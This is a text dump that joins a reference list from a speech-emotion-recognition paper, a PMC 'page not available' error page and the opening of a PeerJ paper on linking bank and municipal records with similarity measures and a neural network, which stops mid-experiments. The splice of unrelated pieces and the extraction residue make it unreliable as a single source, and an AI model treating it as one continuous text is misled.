Sci., DOI 10.7717/peerj-cs.246 29/32 https://peerj.com http://dx.doi.org/10.1109/TASL.2010.2052803 http://dx.doi.org/10.1037/0022-006X.63.5.797 http://dx.doi.org/10.1016/S0005-7894(01)80047-2 http://www.child-encyclopedia.com/language-development-and-literacy/according-experts/language-development-early-age-learning http://www.child-encyclopedia.com/language-development-and-literacy/according-experts/language-development-early-age-learning http://www.child-encyclopedia.com/language-development-and-literacy/according-experts/language-development-early-age-learning http://arXiv.org/abs/1706.02901 http://arXiv.org/abs/1412.6980 http://dx.doi.org/10.7717/peerj-cs.246 Le D, Provost EM. 2013. Emotion recognition from spontaneous speech using hidden markov models with deep belief networks. In: Automatic speech recognition and understanding (ASRU), 2013 IEEE workshop on. IEEE, 216–221. Lee J, Tashev I. 2015. High-level feature representation using recurrent neural network for speech emotion recognition. In: Sixteenth annual conference of the international speech communication association. Li H, Baucom B, Georgiou P. 2016. Sparsely connected and disjointly trained deep neural networks for low resource behavioral annotation: acoustic classification in couples’ therapy. In: Proceedings of interspeech. San Francisco,. Li H, Baucom B, Georgiou P. 2017. Unsupervised latent behavior manifold learning from acoustic features: Audio2behavior. In: 2017 IEEE international conference on acoustics, speech and signal processing (ICASSP). IEEE, 5620–5624. Lim W, Jang D, Lee T. 2016. Speech emotion recognition using convolutional and recurrent neural networks. In: Signal and information processing association annual summit and conference (APSIPA), 2016 Asia-Pacific. IEEE, 1–4. Lustgarten SD. 2015. Emerging ethical threats to client privacy in cloud communication and data storage. Professional Psychology: Research and Practice 46(3):154–160 DOI 10.1037/pro0000018. Mao Q, Dong M, Huang Z, Zhan Y. 2014. Learning salient features for speech emotion recognition using convolutional neural networks. IEEE Transactions on Multimedia 16(8):2203–2213 DOI 10.1109/TMM.2014.2360798. Metallinou A, Wollmer M, Katsamanis A, Eyben F, Schuller B, Narayanan S. 2012. Context-sensitive learning for enhanced audiovisual emotion classification. IEEE Transactions on Affective Computing 3(2):184–198 DOI 10.1109/T-AFFC.2011.40. Mower E, Narayanan S. 2011. A hierarchical static-dynamic framework for emotion classification. In: Acoustics, speech and signal processing (ICASSP), 2011 IEEE international conference on. IEEE, 2372–2375. Narayanan S, Georgiou PG. 2013. Behavioral signal processing: deriving human behavioral informatics from speech and language. Proceedings of the IEEE 101(5):1203–1233 DOI 10.1109/JPROC.2012.2236291. Nasir M, Baucom B, Narayanan S, Georgiou P. 2018. Towards an unsupervised entrainment distance in conversational speech using deep neural networks. ArXiv preprint. arXiv:1804.08782. Nasir M, Baucom BR, Bryan CJ, Narayanan S, Georgiou P. 2017a. Complexity in speech and its relation to emotional bond in therapist-patient interactions during suicide risk assessment interviews. In: Proceedings of Interspeech. Stockholm, 3296–3300. Nasir M, Baucom BR, Georgiou P, Narayanan S. 2017b. Predicting couple ther- apy outcomes based on speech acoustic features. PLOS ONE 12(9):e0185123 DOI 10.1371/journal.pone.0185123. Nasir M, Jati A, Shivakumar PG, Nallan Chakravarthula S, Georgiou P. 2016. Multi- modal and multiresolution depression detection from speech and facial landmark features. In: Proceedings of the 6th international workshop on audio/visual emotion challenge. ACM, 43–50. Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 30/32 https://peerj.com http://dx.doi.org/10.1037/pro0000018 http://dx.doi.org/10.1109/TMM.2014.2360798 http://dx.doi.org/10.1109/T-AFFC.2011.40 http://dx.doi.org/10.1109/JPROC.2012.2236291 http://arXiv.org/abs/1804.08782 http://dx.doi.org/10.1371/journal.pone.0185123 http://dx.doi.org/10.7717/peerj-cs.246 Oatley K, Jenkins JM. 1996. Understanding emotions. Hoboken: Blackwell publishing. Picard RW. 2003. Affective computing: challenges. International Journal of Human- Computer Studies 59(1–2):55–64 DOI 10.1016/S1071-5819(03)00052-1. Povey D, Ghoshal A, Boulianne G, Burget L, Glembek O, Goel N, Hannemann M, Motlicek P, Qian Y, Schwarz P, Silovsky J, Stemmer G, Vesely K. 2011. The Kaldi speech recognition toolkit. In: IEEE 2011 workshop on automatic speech recognition and understanding, EPFL-CONF-192584. IEEE Signal Processing Society,. Sander D, Scherer K. 2014. Oxford companion to emotion and the affective sciences. Oxford: OUP Oxford. Schacter D, Gilbert DT, Wegner DM. 2011. Psychology (2nd Edition). New York: Worth. Scherer KR. 2005. What are emotions? And how can they be measured? Social Science Information 44(4):695–729 DOI 10.1177/0539018405058216. Schlosberg H. 1954. Three dimensions of emotion. Psychological Review 61(2):81–88 DOI 10.1037/h0054570. Schuller B, Batliner A, Steidl S, Seppi D. 2011. Recognising realistic emotions and affect in speech: state of the art and lessons learnt from the first challenge. Speech Communication 53(9–10):1062–1087 DOI 10.1016/j.specom.2011.01.011. Schuller B, Rigoll G, Lang M. 2003. Hidden Markov model-based speech emotion recog- nition. In: Acoustics, speech, and signal processing, 2003. Proceedings.(ICASSP’03). 2003 IEEE international conference on, vol. 2. IEEE, II–1. Schuller BW. 2018. Speech emotion recognition: two decades in a nutshell, benchmarks, and ongoing trends. Communications of the ACM 61(5):90–99. Sculley D, Holt G, Golovin D, Davydov E, Phillips T, Ebner D, Chaudhary V, Young M, Crespo J-F, Dennison D. 2015. Hidden technical debt in machine learning systems. In: Cortes C, Lawrence ND, Lee DD, Sugiyama M, Garnett R, eds. Advances in neural information processing systems. Vol. 28. Curran Associates, Inc., 2503–2511. Soken NH, Pick AD. 1999. Infants’ perception of dynamic affective expressions: do infants distinguish specific expressions? Child Development 70(6):1275–1282 DOI 10.1111/1467-8624.00093. Soltau H, Liao H, Sak H. 2017. Neural speech recognizer: acoustic-to-word LSTM Model for large vocabulary speech recognition. In: Proc. Interspeech 2017. 3707–3711. Spector PE, Fox S. 2002. An emotion-centered model of voluntary work behavior: some parallels between counterproductive work behavior and organizational citizenship behavior. Human Resource Management Review 12(2):269–292 DOI 10.1016/S1053-4822(02)00049-9. Srivastava N, Hinton G, Krizhevsky A, Sutskever I, Salakhutdinov R. 2014. Dropout: a simple way to prevent neural networks from overfitting. The Journal of Machine Learning Research 15(1):1929–1958. Stasak B, Epps J, Cummins N, Goecke R. 2016. An investigation of emotional speech in depression classification. In: Proceedings of Interspeech. 485–489. Tanaka T, Yamamoto T, Haruno M. 2017. Brain response patterns to economic inequity predict present and future depression indices. Nature Human Behaviour 1(10):748–756 DOI 10.1038/s41562-017-0207-1. Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 31/32 https://peerj.com http://dx.doi.org/10.1016/S1071-5819(03)00052-1 http://dx.doi.org/10.1177/0539018405058216 http://dx.doi.org/10.1037/h0054570 http://dx.doi.org/10.1016/j.specom.2011.01.011 http://dx.doi.org/10.1111/1467-8624.00093 http://dx.doi.org/10.1016/S1053-4822(02)00049-9 http://dx.doi.org/10.1038/s41562-017-0207-1 http://dx.doi.org/10.7717/peerj-cs.246 Tao J, Tan T. 2005. Affective computing: a review. In: International conference on affective computing and intelligent interaction. Berlin, Heidelberg: Springer Berlin Heidelberg, 981–995. Tong E, Zadeh A, Jones C, Morency L-P. 2017. Combating human trafficking with multimodal deep models. In: Proceedings of the 55th annual meeting of the association for computational linguistics (Volume 1: Long Papers), vol. 1. 1547–1556. Torrey L, Shavlik J. 2010. Transfer learning. In: Handbook of research on machine learning applications and trends: algorithms, methods, and techniques. Hershey, Pennsylvania: IGI Global, 242–264. Tseng S-Y, Baucom B, Georgiou P. 2018. Unsupervised online multitask learning of behavioral sentence embeddings. ArXiv preprint. arXiv:1807.06792. Tseng S-Y, Chakravarthula SN, Baucom B, Georgiou P. 2016. Couples behavior modeling and annotation using low-resource LSTM language models. In: Proceedings of interspeech. San Francisco. Venek V, Scherer S, Morency L-P, Rizzo A, Pestian J. 2017. Adolescent suicidal risk assessment in clinician-patient interaction. IEEE Transactions on Affective Computing 8(2):204–215 DOI 10.1109/TAFFC.2016.2518665. Vinciarelli A, Pantic M, Bourlard H. 2009. Social signal processing: survey of an emerging domain. Image and Vision Computing 27(12):1743–1759 DOI 10.1016/j.imavis.2008.11.007. Wöllmer M, Metallinou A, Eyben F, Schuller B, Narayanan S. 2010. Context-sensitive multimodal emotion recognition from speech and facial expression using bidirec- tional lstm modeling. In: Proc. INTERSPEECH 2010, Makuhari, Japan. 2362–2365. Zadeh AB. 2019. CMU-MultimodalSDK. GitHub. Available at https://github.com/ A2Zadeh/CMU-MultimodalSDK (accessed on March 2019). Zadeh AB, Liang PP, Poria S, Cambria E, Morency L-P. 2018. Multimodal language analysis in the wild: Cmu-mosei dataset and interpretable dynamic fusion graph. In: Proceedings of the 56th annual meeting of the association for computational linguistics (Volume 1: Long Papers), vol. 1. 2236–2246. Zheng W, Yu J, Zou Y. 2015. An experimental study of speech emotion recognition based on deep convolutional neural networks. In: Affective computing and intelligent interaction (ACII), 2015 international conference on. IEEE, 827–831. Li et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.246 32/32 https://peerj.com http://arXiv.org/abs/1807.06792 http://dx.doi.org/10.1109/TAFFC.2016.2518665 http://dx.doi.org/10.1016/j.imavis.2008.11.007 https://github.com/A2Zadeh/CMU-MultimodalSDK https://github.com/A2Zadeh/CMU-MultimodalSDK http://dx.doi.org/10.7717/peerj-cs.246 work_hwbci5wyvrc4vj6v6fg4taxjqm ---- wp-p1m-38.ebi.ac.uk Params is empty 404 sys_1000 exception wp-p1m-38.ebi.ac.uk no 265360404 Params is empty 265360404 exception Params is empty 2021/04/06-17:58:08 if (typeof jQuery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/1.14.8/js/jig.min.js"][/script]'.replace(/\[/g,String.fromCharCode(60)).replace(/\]/g,String.fromCharCode(62))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} Page not available Reason: The web page address (URL) that you used may be incorrect. Message ID: 265360404 (wp-p1m-38.ebi.ac.uk) Time: 2021/04/06 17:58:08 If you need further help, please send an email to PMC. Include the information from the box above in your message. Otherwise, click on one of the following links to continue using PMC: Search the complete PMC archive. Browse the contents of a specific journal in PMC. Find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/MED/ work_hwz54ezyk5eq3arb5vhhhhhily ---- Submitted 12 August 2019 Accepted 21 January 2020 Published 24 February 2020 Corresponding author Antonio Maratea, antonio.maratea@uniparthenope.it Academic editor Yilun Shang Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.258 Copyright 2020 Maratea et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Record linkage of banks and municipalities through multiple criteria and neural networks Antonio Maratea, Angelo Ciaramella and Giuseppe Pio Cianci Department of Science and Technology, University of Naples ‘‘Parthenope’’, Naples, Italy ABSTRACT Record linkage aims to identify records from multiple data sources that refer to the same entity of the real world. It is a well known data quality process studied since the second half of the last century, with an established pipeline and a rich literature of case studies mainly covering census, administrative or health domains. In this paper, a method to recognize matching records from real municipalities and banks through multiple similarity criteria and a Neural Network classifier is proposed: starting from a labeled subset of the available data, first several similarity measures are combined and weighted to build a feature vector, then a Multi-Layer Perceptron (MLP) network is trained and tested to find matching pairs. For validation, seven real datasets have been used (three from banks and four from municipalities), purposely chosen in the same geographical area to increase the probability of matches. The training only involved two municipalities, while testing involved all sources (municipalities vs. municipalities, banks vs banks and and municipalities vs. banks). The proposed method scored remarkable results in terms of both precision and recall, clearly outperforming threshold-based competitors. Subjects Artificial Intelligence, Data Science, Databases Keywords Record Linkage, Entity resolution, Neural networks, Feature extraction, Deduplication INTRODUCTION Record Linkage (RL from now on, also called entity resolution or entity matching), is the process of identifying records coming from different sources that refer to the same real-world entity. Similarly, Record Deduplication (RD from now on) is the process of identifying duplicate records, where the same entity of the real word has been entered multiple times in the same database. The main difference between RL and RD is that records coming from different sources may lack a common identifier and schema (please refer to Christen (2012) and Zhang (2011) for a general discussion of related issues). The pairing of records or the identification of duplicates is a statistically challenging and computationally demanding problem: scarce data quality control results in errors, noise, missing values, omissions, ambiguities and even lies in the data, that combined with the differences in database schemas and regional conventions when the number of nationalities grows, results in a daunting number of factors to be considered. The brute- force comparison All Versus All (AVA) of the records from different sources to discover occasional matches is unfeasible even for a modest volume of data. Notwithstanding these How to cite this article Maratea A, Ciaramella A, Cianci GP. 2020. Record linkage of banks and municipalities through multiple criteria and neural networks. PeerJ Comput. Sci. 6:e258 http://doi.org/10.7717/peerj-cs.258 https://peerj.com/computer-science mailto:antonio.maratea@uniparthenope.it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.258 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.258 difficulties, RL is known and has been treated since the second half of the last century, with a rich literature in different domains (surveys in the context of data warehousing and for different phases can be found in Brizan & Tansel (2006) and Christen (2011)) and an established implementation process (see ‘Phases of RL’). While data quality is related to and borrows techniques from RL and RD, it acts as an a priori filter, trying to prevent the insurgence of duplicate records with a proper control process before the data consolidation. RL and RD, on the contrary, act as a posteriori filters, trying to detect duplicate records and clean the data after consolidation. To the data analyst, they represent a required pre-processing step when it is legitimate to assume that the data to be analyzed are corrupted by consequence of a scarce quality control during acquisition, or come from heterogeneous sources with respect to time, place or context (please refer to Batini & Scannapieco (2006) for a general discussion of related issues). The traditional approach to RL and RD is probabilistic, or rule-based, and only relatively recently Machine Learning alternatives have emerged (see Zhao & Ram (2005)). The probabilistic approach is grounded on the estimation of probabilities of match and on thresholds for the similarity scores; the rule-based approach tries to explicitly model the knowledge of domain experts; the Machine Learning approach, on the contrary, relies only on data and can be cost-sensitive, supervised, unsupervised, or semi-supervised. In the following a multiple-criteria feature vector and a supervised classifier are proposed in the classification phase of the RL process, outperforming classic crude threshold-based methods and producing remarkable results. The paper is organized as follows: in ‘Background’ the phases of a traditional RL process and the related literature on Neural Networks are sketched; in ‘Materials and Methods’ the proposed method is presented in detail; in ‘Experiments’ the used data and the experiments are fully described; finally, in ‘Conclusions’, main conclusions are drawn. BACKGROUND First the currently established phases of a RL process will be outlined, then the recent literature on Neural Networks applied to RL will be summarized. Phases of RL The RL of two sources generally involves five independent phases, each exploiting different techniques, criteria, and algorithms Christen (2012): 1. Data pre-processing : the two sources are cleaned and normalized to ensure that all the data have the same format and are as much as possible error free; 2. Indexing : to save time, the record pairs that are evidently different are filtered out from the comparisons through clustering, sorting or blocking. Record Linkage is exponential in nature, as each record from the first source should be compared with all the records from the other sources, hence indexing is critical for performance; 3. Comparison: only the record pairs within the same block (or cluster) are actually compared one by one, using multiple similarity criteria that are conveyed into a similarity vector; Maratea et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.258 2/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.258 4. Classification: the similarity vector obtained from each pair of records within the same block (or cluster) is classified into one of three groups: • (M) –matches, that is pairs that do refer to the same entity of the real world; • (NM) –non-matches, that is pairs that do not refer to the same entity of the real world; • (PM) –potential-matches or ambiguous pairs, that is pairs that can’t be classified with sufficient precision or reliability; 5. Evaluation: the classified pairs are reviewed for final labeling. Specifically, the PM class is subject to a clerical review, where domain experts decide for each ambiguous pair if it is actually a match or not. Related work Being a possible consequence of both a poor data quality process than natural differences in the data evolving over time, RL has been found in countless domains and tackled using many techniques and approaches. The related literature can be broadly split into census, administrative or health related applications, with a majority of works exploiting probabilistic methods. Artificial Neural Networks (ANN from now on) as classifiers are less in number and relatively recent. Some of the main issues of administrative data linkage are privacy and confidentiality requirements and to the absence of common identifiers (much like health data. Please refer to Harron et al. (2017) for a discussion and to Vatsalan, Christen & Verykios (2013) for a taxonomy). If from one side epidemiological studies linking census or administrative data to diseases are pretty common, from the other side the specific case of linking census with financial data at the individual level is rare, if not absent, in the RL literature. The reason is that medical data are mostly held by public agencies that have a public interest in sharing their data and supporting medical research, while banks are private companies that keep their data safe and secure on their servers, having little interest in sharing their analysis. Recent literature on Machine Learning applied to RL includes Aiken et al. (2019), that compares probabilistic, stochastic and machine learning approaches, showing that supervised methods outperform unsupervised ones; Dong & Rekatsinas (2018), that surveys state-of-the-art data integration solutions based on Machine Learning with a discussion of open research challenges; Kasai et al. (2019), that leverages Deep Learning in a combination of Transfer and Active Learning aiming to save labeled data up to an order of magnitude; Di Cicco et al. (2019), that presents an attempt of explainable Deep Learning exploiting LIME, a popular tool for prediction explanations in classification; Hou et al. (2019), that propose a paradigm called ‘‘gradual machine learning’’ where data are labeled automatically through iterative factor graph inference, starting with the easiest instances and going up to the hardest ones. A survey of the state of the art is beyond the scope of this paper, so this section will focus on ANN classifiers applied to classification in RL, in line with the recent explosion of ANN related literature (please see Maratea & Ferone, 2018). Maratea et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.258 3/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.258 One of the first attempts is apparently due to Zhao & Ram (2005), that proposed a set of ensemble learning methods combining multiple base classifiers, including a backpropagation ANN. Records are compared through various similarity measures and classifiers are merged through Bagging, Boosting, Stacking, Cascading or cross-validated committees. Using 25,000 records (20,000 non-matching examples and 5,000 matching examples) from an application service provider (ASP) for the airline industry, the authors tried to identify the same customer that reserved different flights with different airline companies, reaching over 99% of accuracy. Authors warn the reader on the limited generalization of the experiments due to the ‘‘somewhat balanced’’ data used. More recently, Wilson (2011) showed on the base of genealogical databases that the results obtainable from the probabilistic RL are easily improvable through one of the various available Machine Learning or ANN techniques, and that even a simple single layer perceptron network tends to outclassify the probabilistic approaches, reaching 95% of precision and 97.2% of recall compared to 72.5% precision and 91% recall of the probabilistic methods. A singular case is the work Siegert et al. (2016) in the linkage of epidemiological cancer registries data previously pseudo-randomized through hashing and encrypted for privacy reasons. Features are extracted from the obscured data and used as they were a new coding of the records, then the classification is performed on these coded data. Similarly to Zhao & Ram (2005), multiple classifiers and ensembles are tested, with many aggregation functions. Approximately 35,000 match pairs and 38,000 of not matches for a total of 73,000 pairs of records were manually classified from the North Rhine-Westphalia cancer registry in Germany and used as training-set for the supervised learning classifiers. The proposed ANN is structured with a single hidden layer of 60 neurons and a sigmoidal activation function. Among the three classifiers used, the one based on ANN provided better results in both precision and recall terms, reaching a 95.2% precision and 94.1% recall. Even in this case, data are artificially balanced. Subitha & Punitha (2014) propose the use of Elman’s neural networks to pair the medical records collected by hand from different hospitals and departments, achieving an accuracy of 85% and a recall of 98% with respect to fuzzy decision trees (75% and 95%) and decision trees (79% and 96%). The comparing phase was performed using only the normalized Levenshtein distance as the similarity criteria. The Elman Neural Network (ENN) is a particular type of neural network in which a layer of neurons called ‘‘context units’’ connected with a fixed weight of 1.0 both to the input and to the output of the hidden layer is added. In the context units, a copy of the last output of the hidden layer is saved to be used for subsequent inputs. In this way the network can maintain a sort of state, allowing tasks such as the prediction of sequences that go beyond the power of a standard multilayer perceptron. Mudgal et al. (2018) present a general framework for the application of Deep Neural Networks (DNN from now on) to RL, stressing connections with Natural Language Processing: three type of problems are highlighted: structured, textual and dirty RL. Their goal is to illustrate the benefits and limitations of DL when applied to RL. An empirical Maratea et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.258 4/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.258 Figure 1 Block diagram of the proposed method. Full-size DOI: 10.7717/peerjcs.258/fig-1 evaluation based on 4 models and 11 datasets is presented to show when DNN outperform traditional approaches, obtaining a relevant improvement in case of unstructured data. Kooli, Allesiardo & Pigneul (2018) report a DNN application for RL using Relevant Word Extraction and Word Embedding instead of the classic calculation of the similarity vector from record pairs. Three architectures are compared: Multi-Layer Perceptron (MLP), Long Short Term Memory networks (LSTM) and Convolutional Neural Networks (CNN) on poorly structured scientific publications databases by getting very good results and showing improvements compared to classical similarity-based approaches. The authors point out that their approach is fully automatic unlike a previous job of Gottapu, Dagli & Ali (2016) that also uses DNN but in a human/machine hybrid fashion, by facilitating the manual categorization in a crowd-sourcing methodology, by proposing to the operator a list of possible matches. Ebraheem et al. (2018) used unidirectional and bidirectional recurrent neural networks (RNNs) with long short term memory (LSTM) hidden units to convert each tuple to a distributed representation, which was the base for subsequent classification. Experiments on 7 Datasets from different domains showed promising results. MATERIALS AND METHODS A block representation of the proposed method is depicted in Fig. 1: it involves the comparing and classifying phases of RL (see ‘Phases of RL’): it takes as input pairs of records and classifies them into ‘‘match’’ (M) or ‘‘non-match’’ (NM) through an ANN. The features of each candidate record pair are extracted by comparing each corresponding attribute with multiple similarity functions, resulting in a similarity vector (see below for more details). It is this similarity vector that is used for the subsequent classification of the candidate pair. In order to have comparable tests, all preceding phases use the same methods and parameters. Data sources Real data from separate municipal and banking databases have been gathered, chosen in the same geographical area to increase the probability of match (see Table 1). For both municipal and banking databases, each person is identified through the fiscal code (alias social security number, alias insurance number). Being a natural key and a reliable field, this common identifier was leveraged to create, through joins, a gold standard for training and evaluation purposes: if in a pair, both records had the same value for the fiscal code, they are considered a true-match. The fiscal code is derivable from first name, last name, date and place of birth plus some special codes. Surprisingly, clerical reviews showed that in rare cases even the fiscal code Maratea et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.258 5/20 https://peerj.com https://doi.org/10.7717/peerjcs.258/fig-1 http://dx.doi.org/10.7717/peerj-cs.258 Table 1 Used databases flanked by their size. Database name type Alias # record ANAG_UNO Municipal registry A 42,698 ANAG_DUE Municipal registry B 45,100 ANAG_TRE Municipal registry C 42,559 ANAG_QUATTRO Municipal registry D 57,434 BCC_UNO Bank details X 1,052,737 BCC_DUE Bank details Y 101,651 BCC_TRE Bank details Z 93,179 Table 2 Attributes in common between banking and municipal databases. Attribute Municipal column Bank column SURNAME COGNOME INTESTAZIONE_A NAME NOME INTESTAZIONE_B SEX SESSO SESSO BIRTH STATE STATO_NASCITA NAZIONALITA BIRTH DATE DAT_NASCITA DATA_NASCITA BIRTH PLACE COM_NAS DESCR_COM_NASC BIRTH PROVINCE PROV_COM_NAS PROVINCIA_NASC VIA_DOM ADDRESS NUMERO_CIVICO_DOM VIA_RES ZIP CODE CAP_DOM CAP_RES PROVINCE PROV_COM_DOM PROV_RES TELEPHONE TELEFONO NUMERO_TELEFONO presents some errors, i.e., does not correspond to the value derivable from the other fields of the record. This can lead to rare cases in which a pair of records is correctly classified as a match by the classifier but results indeed a false positive for the evaluation metric. For this reason, all the figures of merit presented hereafter have to be considered conservatively estimated. Relevant attributes As a first step, it is necessary to select a subset of relevant and shared attributes between the municipal and banking databases to be used in the RL process. The selected attributes are shown in Table 2. Special attention should be paid to attributes address, zip code and province because they have a different meaning, representing the home address in municipalities databases and the residence address in banking databases. These values are often the same but do not always coincide. Each attribute is cleaned, standardized and normalized through multiple transforma- tions, turning everything lower case, removing special symbols, punctuation, repeated spaces, non-alphabetic characters and finally normalizing accented letters. Maratea et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.258 6/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.258 Indexing Indexing is performed with multiple blocking indexing, combining the results obtained from 3 blocking keys. 1. Blocking key 1: <SURNAME, NAME, B.DATE>, using the Double Metaphone phonetic algorithm for the key comparison; 2. Blocking key 2:<B.DATE, B.PLACE, B.PROVINCE>, using the Double Soundex phonetic algorithm for the key comparison; 3. Blocking key 3: <SURNAME, NAME, SEX, B.DATE, B.PLACE, B.PROVINCE> using for the key comparison: the last 3 character suffix for name and surname; the first 4 character prefix for the birth place and province; and the year and month for the birth date. These blocking criteria were determined through experimental test and chosen to maximize the pair completeness as much as possible by keeping the number of candidate record pairs generated low, to reduce the execution time in view of the numerous tests to be performed. Comparing In the comparison phase, the similarity of each pair of records (A,B) is measured using a set S of string-based similarity functions on the corresponding attributes (name of the first record with name of the second record, surname of the first record with surname of the second record and so on). Each comparison function has a normalized output in the interval [0,1]. Where 0 indicates maximum dissimilarity and 1 indicates maximum similarity (please see Navarro, 2001; Christen, 2012). The set S of comparison functions used is listed below: (a) Jaro–Winkler, (b) Levenshtein, (c) Cosine, (d) Jaccard, (e) Siresen-Dice, (f) Bigrams, (g) Trigrams, (h) Exact. Each one of the corresponding attributes pairs (ai,bi) is compared using all the function in the set and the resulting values are then chained in a similarity vector s. s=simS(a1,b1)⊕simS(a2,b2)⊕simS(a3,b3)⊕ ... Figure 2 shows an example of this procedure. At the end, each pair of records will be associated with a similarity vector to be used for classification. Classifying The ANN used for the classification is shown in the Fig. 3, it’s a fully connected MultiLayer Perceptron network (MLP from now on), with two hidden layers in a pyramidal structure, a ReLu activation function: ReLu(x)=x+=max(0,x) and a Softmax cross entropy loss function: L(y,ŷ)= ∑ i H(yi,ŷi)= ∑ i yi ·logŷi. The optimal number of neurons and the size of the layers have been determined through iterative optimization on experimental tests. The final architecture is: Maratea et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.258 7/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.258 Figure 2 Example of the similarity vector obtained comparing two records using four similarity func- tions (please see Table 2 for attribute mapping). Full-size DOI: 10.7717/peerjcs.258/fig-2 • Input Layer: a layer of as many neurons as the components of the similarity vectors to be classified; • Hidden Layer: two layers to form a pyramidal structure, the first with 8 and the second with 4 neurons; • Output Layer: a layer of two neurons, one for the class of the matches (M) and the other for the non-matches (NM). For the initialization the glorot_uniform_initializer (aka Xavier uniform initializer) was used. With this random initalization of the MLP parameters no relevant changes in the performance were noted over different runs. The network was trained using the Adam optimizer by applying a L1 regularization to avoid overfitting. Training data-set generation The training data-set, in the format (feature,label) is generated based on the candidate record pairs identified in the indexing phase between databases A and B, where: • feature: is the similarity vector obtained comparing the records of the pair; • label: is true-match (M) or true-not match (NM), according to the gold standard. The built training data-set contains 10,876 samples, 1,567 of which are labeled as true-match (M) and 9300 as true-non-match (NM). Since non-matching record pairs are more than matching ones, the training data are moderately imbalanced (they are in the same order of magnitude). Over-sampling techniques like ADASYN (He et al., 2008) and based on SMOTE, such as SMOTENC (Bowyer et al., 2011) SMOTENN (Batista, Prati & Monard, 2004), SMOTETomek (Batista, Maratea et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.258 8/20 https://peerj.com https://doi.org/10.7717/peerjcs.258/fig-2 http://dx.doi.org/10.7717/peerj-cs.258 Figure 3 Used fully connected MLP architetture for the classifyng phase. Where the input layer as many neurons as the components of the similarity vectors to be classified. There are two hidden layers one of size 8 and the other of 4 and the output layer is composed of two units, one for the class of the matches (M) and the other for the non-matches (NM). The activation function used is the ReLu and the loss function is the Softmax cross entropy. The weights are initalized with Xavier uniform initializer and the training was performed using the Adam optimizer by applying a L1 regularization. Full-size DOI: 10.7717/peerjcs.258/fig-3 Bazzan & Monard, 2003) have been tested, without any significant improvement, so oversampling was skipped from final experiments. EXPERIMENTS For each test the same set of attributes, pre-processing and indexing techniques have been used in order to focus on the comparing and classifying phases. Figure 4 shows the starting condition for the tests in order to have a reference on the number of true-match and of pairs identified by the indexing between the various coupled databases. Since there are seven different databases available, grouped in municipalities (four) and banks (three), 21 executions will be performed for each test, pairing databases between groups and excluding deduplication (that is the match of a database against itself). Only the pair (A, B) is used as training-set. The chosen figure of merits are precision and recall, preferred to plain accuracy due to the moderate imbalance, as explained by Christen & Goiser (2007). Their average and standard deviation over the 21 runs are reported in the following. Maratea et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.258 9/20 https://peerj.com https://doi.org/10.7717/peerjcs.258/fig-3 http://dx.doi.org/10.7717/peerj-cs.258 Figure 4 Tests starting conditions after the indexing phase, for all the possible pairs of databases. (A) Number of candidate record pairs to be classified, obtained from the indexing phase. (B) Number of True- Match record pair in the gold standard. (C) Pair completeness, i.e., percentage of true match retrieved in the indexing phase with respect to the gold standard. Full-size DOI: 10.7717/peerjcs.258/fig-4 Figure 5 Exact matching results. (A) Precision; (B) recall. Full-size DOI: 10.7717/peerjcs.258/fig-5 Exact matching In the very first test, RL has been performed with an Exact Match goal, where the candidate record pairs are classified as match only if all the respective fields are perfectly equal. This test has been carried out only to show how much two databases, while containing the same information, actually differ in the values of their attributes. As expected (Fig. 5), the precision is extremely high, but the number of matches is extremely low, as shown by the recall. In fact, in some cases no pair have been identified, with a maximum of only 4 matches, by consequence of errors, noise, and random variations in the corresponding data. Maratea et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.258 10/20 https://peerj.com https://doi.org/10.7717/peerjcs.258/fig-4 https://doi.org/10.7717/peerjcs.258/fig-5 http://dx.doi.org/10.7717/peerj-cs.258 Figure 6 Results for Levenshtein normalized distance with threshold θ = 0.7. (A) Precision; (B) recall. Full-size DOI: 10.7717/peerjcs.258/fig-6 Threshold based classification In the next test an optimal binary threshold classifier was used. The threshold value was determined through a PR graph (precision–recall) generated on the training data-set. As threshold, the value having coordinates closest to the ideal point (1.0,1.0) was chosen (see Figs. A1–A3). Levenshtein threshold in this test, the only similarity criterion was the Levenshtein normalized distance (Levenshtein, 1966)—one of the most widely used comparison metrics. • Comparing : Levenshtein normalized distance. • Classifying : binary threshold with θ =0.7 as optimal value, applied to the weighted sum of the similarity vector. • Weighting : each attribute has the same importance and weight. Figure 6 shows the results obtained on the 21 executions. The average precision is 69,63% and the average recall is 77,04%, although with high variability. Multiple criteria threshold In this test, multiple comparison criteria for each attribute were used, with the underlying idea that different criteria measure different facets of the similarity between them. Recall actually improved. • Comparing : each attribute is compared using the following metrics: (a) Jaro–Winkler, (b) Levenshtein, (c) Cosine, (d) Jaccard, (e) Siresen-Dice, (f) Bigrams, (g) Trigrams, (h) Exact. • Classifying : binary threshold with θ =0.63 as optimal value applied to the weighted sum of the similarity vector. • Weighting : each attribute has the same importance and weight. Figure 7 shows the results of the 21 executions: the average precision is 71,93% and the average recall is 85,85%, although with high variability. Maratea et al. (2020), PeerJ Comput. Sci., DOI 